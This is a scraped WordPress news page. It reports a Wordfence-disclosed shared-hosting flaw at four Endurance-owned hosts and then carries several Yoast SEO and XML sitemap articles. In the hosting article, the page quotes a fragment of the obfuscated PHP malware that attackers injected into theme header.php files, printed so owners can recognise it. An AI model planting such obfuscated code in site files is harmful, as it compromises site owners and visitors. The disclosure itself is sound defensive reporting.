Connect with us

WordPress

Web Host Vulnerability Discovered at iPage, FatCow, PowWeb, and NetFirm

Published

on

Web Host Vulnerability Discovered at iPage, FatCow, PowWeb, and NetFirm


WordFence announced that they had discovered a vulnerability at four hosting companies. WordFence warns that while the vulnerability was patched, it’s possible sites were hacked prior to the fix.

Server settings allowed hackers to create WordPress administrator accounts from which the sites could be exploited with rogue code added to the WordPress theme.

WordFence urged site administrators to check their sites for rogue administrator accounts if they are hosted on iPage, FatCow, PowWeb, or NetFirm. All four are owned by the same company, Endurance International Group.

What Was the Server Vulnerability?

The affected servers had permission and file settings that allowed an attacker to view sensitive files. Other vulnerabilities allowed the attackers to access the database, add themselves as an administrators then take over the site.

This is how WordFence described the vulnerability:

“Four conditions existed that contributed to this vulnerability:

1. Customer files are all stored on a shared file system.

2. The full path to a user’s web root directory was public or could be guessed.

3. All directories in the path to a customer’s site root directory were either world-traversable (the execute bit for ‘all users’ is 1) or group-traversable (the execute bit for ‘group’ is 1), and the sensitive files were world-readable (the read bit for ‘all users’ is 1) or group-readable (the read bit for ‘group’ is 1).

4. An attacker could cause a program running in the group www to read files in arbitrary locations.”

Sites Could be Infected

WordFence warned that there was a period of time before the vulnerability was fixed during which sites hosted on these four host providers could have been infected.

It is recommended that site owners check their user lists to make sure there are no unauthorized administrators. If your site has been affected, then there should be rogue code that was added to the theme.

Here is how WordFence described the rogue code:

“If your site was exploited before the fixes, the attackers may have added malware which could still be present. Our customers had obfuscated code added at the top of the active theme’s header.php file, similar to this:

<?php ${“x47x4cx4fx42x41x4cx53”}[“ddx70x68zx67x64gx”]=”slx77kx77i”;${“x47x4cOx42x41Lx53”}[“cx7ax66x6dubkdox6ax78″]=”x6cx6fx63x61tx69x6fn”;${“x47x4cx4fBx41LS”}[“x67x64x64ex74x62px75fx65i”]=”x68tx6dx6c”;${“x47x4cOBx41x4cS”}[“x77ix64x68x6bvx6da”]=”x73tx72x66″;${“x47x4cx4fx42x41x4cx53”}[“x66sx75x71x79x6evw”]=”bx6fx74″;${“x47x4cOBALx53”}[“wx6cx79x63x61x76x62x71x68x6fx6cx75″]=”cacx68x65”;${“Gx4cOx42x41Lx53”}[“ryx68x72kux6b”]=”x73x63hx65x6dx65″;${“x47x4cx4fx42x41Lx53”}[“x74x6ax6bcx64ex65x69w”]=”x73lx77kx77ix32″;${“Gx4cOBAx4cS”}[“x79x65x64x73x67x6ahx69x73x67″]=”x73x6cx74lx65x69lx73″;”

Vulnerability Has Been Fixed

WordFence disclosed the vulnerability to the hosting companies before making a public announcement. The hosting companies promptly fixed the vulnerabilities.

Nevertheless, according to the guidance offered by WordFence, you may wish to check your user lists for rogue admin level accounts and review your header.php file for rogue code.

Read the entire announcement at the WordFence blog

Images by Shutterstock, Modified by Author



Continue Reading
Click to comment

You must be logged in to post a comment Login

Leave a Reply

WordPress

Yoast, Google devs propose XML Sitemaps for WordPress Core

Published

on

Yoast, Google devs propose XML Sitemaps for WordPress Core


The inclusion of XML Sitemaps as a WordPress Core feature has been proposed by a group of Yoast and Google team members as well as other contributors. In addition to a basic XML Sitemap, the proposal also introduces an XML Sitemaps API that would extend functionality for developers and webmasters.

The proposed XML Sitemaps structure. Image sourced from Make WordPress Core.

What it’ll include. The proposal states that XML Sitemaps will be enabled by default, allowing for indexing of the following content types:

  • Homepage
.
  • Posts page
.
  • Core post types (Pages and Posts)
.
  • Custom post types
.
  • Core taxonomies (Tags and Categories)
.
  • Custom taxonomies
.
  • Users (Authors)
.

It’s worth keeping in mind that your WordPress site’s automatically generated robots.txt file will also reference your sitemap index.

What it won’t include. Although the proposed feature will include the majority of WordPress content types and meet search engine minimum requirements, the initial integration will not cover image, video or news sitemaps, XML Sitemaps caching mechanisms or user-facing changes such as UI controls that exclude individual posts or pages from the sitemap.

The XML Sitemaps API. Here’s how the API will let you manipulate your XML Sitemaps:

  • Provide a custom XML Stylesheet
.
  • Add extra sitemaps and sitemap entries
.
  • Add extra attributes to sitemap entries
.
  • Exclude a specific post, post type, taxonomy or term from the sitemap
.
  • Exclude a specific author from the sitemap
.
  • Exclude specific authors with a specific role from the sitemap
.

Why we should care. Sitemaps facilitate indexing by providing web crawlers with your site’s URLs. If implemented, this might mean one less third-party plugin that brands and webmasters have to rely on for their SEO efforts. As a WordPress Core feature, we can expect wider compatibility and support than we might get from third-party solutions.

Poorly optimized plugins can also slow down your site, which can have a negative impact on your organic traffic. This default option from WordPress may not replace plugins like Yoast SEO because they often include other features in addition to XML Sitemaps, but its availability has the potential to provide us with more flexibility over which plugins we install.


About The Author

George Nguyen is an Associate Editor at Third Door Media. His background is in content marketing, journalism, and storytelling.

Continue Reading

WordPress

Yoast SEO 11.4 adds FAQ structured data, UX improvements

Published

on

Yoast SEO 11.4 adds FAQ structured data, UX improvements


Yoast SEO’s latest update enhances its FAQ blocks by automatically generating structured data to accompany questions and answers. The update also introduces some UX improvements and addresses issues with AMP pages when viewed in Reader mode.

How to use it. Yoast’s FAQ structured data implementation is only compatible with the WordPress block editor (also known as Gutenberg; available on versions 5.0 and newer). Webmasters can get started by selecting the FAQ block, adding a question, inputting the answer and an image (if applicable) and repeating the process for all frequently asked questions.

The Yoast FAQ block.

The corresponding FAQpage structured data will be generated in the background and added to Yoast’s structured data graph, which may help search engines identify your FAQ page and figure out how it fits into the overall scheme of your site.

A new action and filter were also introduced to make this integration more flexible. The wpseo_pre-schema_block-type_<block-type> lets you adjust the graph output based the blocks on the page and the wpseo_schema_block_<block-type> filter enables you to filter graph output on a per-block basis.

Other improvements. Yoast has also linked the SEO and readability scores in the Classic Editor and relocated the Focus keyphrase field to the top of meta box and sidebar to make it easier to find. And, they’ve resolved issues with AMP pages when viewed in Reader mode.

Why we should care. At this year’s I/O conference, Google announced support for FAQ markup, which may mean that searchers will be presented with FAQs as rich results more frequently. Being able to easily and efficiently equip our FAQ sections with structured data can yield better odds of earning prominent placement on SERPs.

For more on Yoast’s structured data implementation, check out our coverage on their 11.0 (general schema implementation), 11.1 (image and video), 11.2 (custom schema) and 11.3 (image and avatar) updates.


About The Author

George Nguyen is an Associate Editor at Third Door Media. His background is in content marketing, journalism, and storytelling.

Continue Reading

WordPress

Yoast SEO 11.3 lets you add an image of a person to its structured data graph

Published

on

Yoast SEO 11.3 lets you add an image of a person to its structured data graph


Yoast’s latest plugin update lets webmasters include an image, avatar or logo in its structured data graph and adds a new filter that can be used to disable link indexation. It also announced that it will be pulling support for versions of WordPress below 5.2 as soon as 5.3 is released.

An image, photo or logo can be associated with the person the site represents.

Why we should care. Like it or not, rich results are showing up in SERPs more and more. Using structured data markup can help search engines understand your content and display it as a rich result. In this particular case, applying it to the image of a person that a website represents may help surface that image on relevant queries and increase traffic.

Yoast typically only supports the two most recent WordPress versions, but they’ve kept supporting WordPress 4.9 to give webmasters more time to switch over to 5.0’s new editor. When 5.3 is released, sites that aren’t at least on WordPress 5.2 may not get the full benefits of Yoast’s schema implementation.

More on the update. Along with some bug fixes, Yoast also included a new wpseo_should_index_links filter that webmasters can use if they want to disable link indexation and added support for built-in taxonomies for those that would like to include their blog archive page in the breadcrumbs.

Beginning with Yoast SEO 11.0, the plugin creator has focused on revamping schema implementation to make it more accessible. Its previous updates have been focused on helping users provide the correct information for Google Knowledge Panels, Pinterest Rich Pins, applying Schema to images and videos as well as customizing what structured data gets shown to search engines. It has been releasing updates just about every other week, so we may see another one around mid-June.


About The Author

George Nguyen is an Associate Editor at Third Door Media. His background is in content marketing, journalism, and storytelling.



Source link

Continue Reading

Trending

Copyright © 2019 Plolu.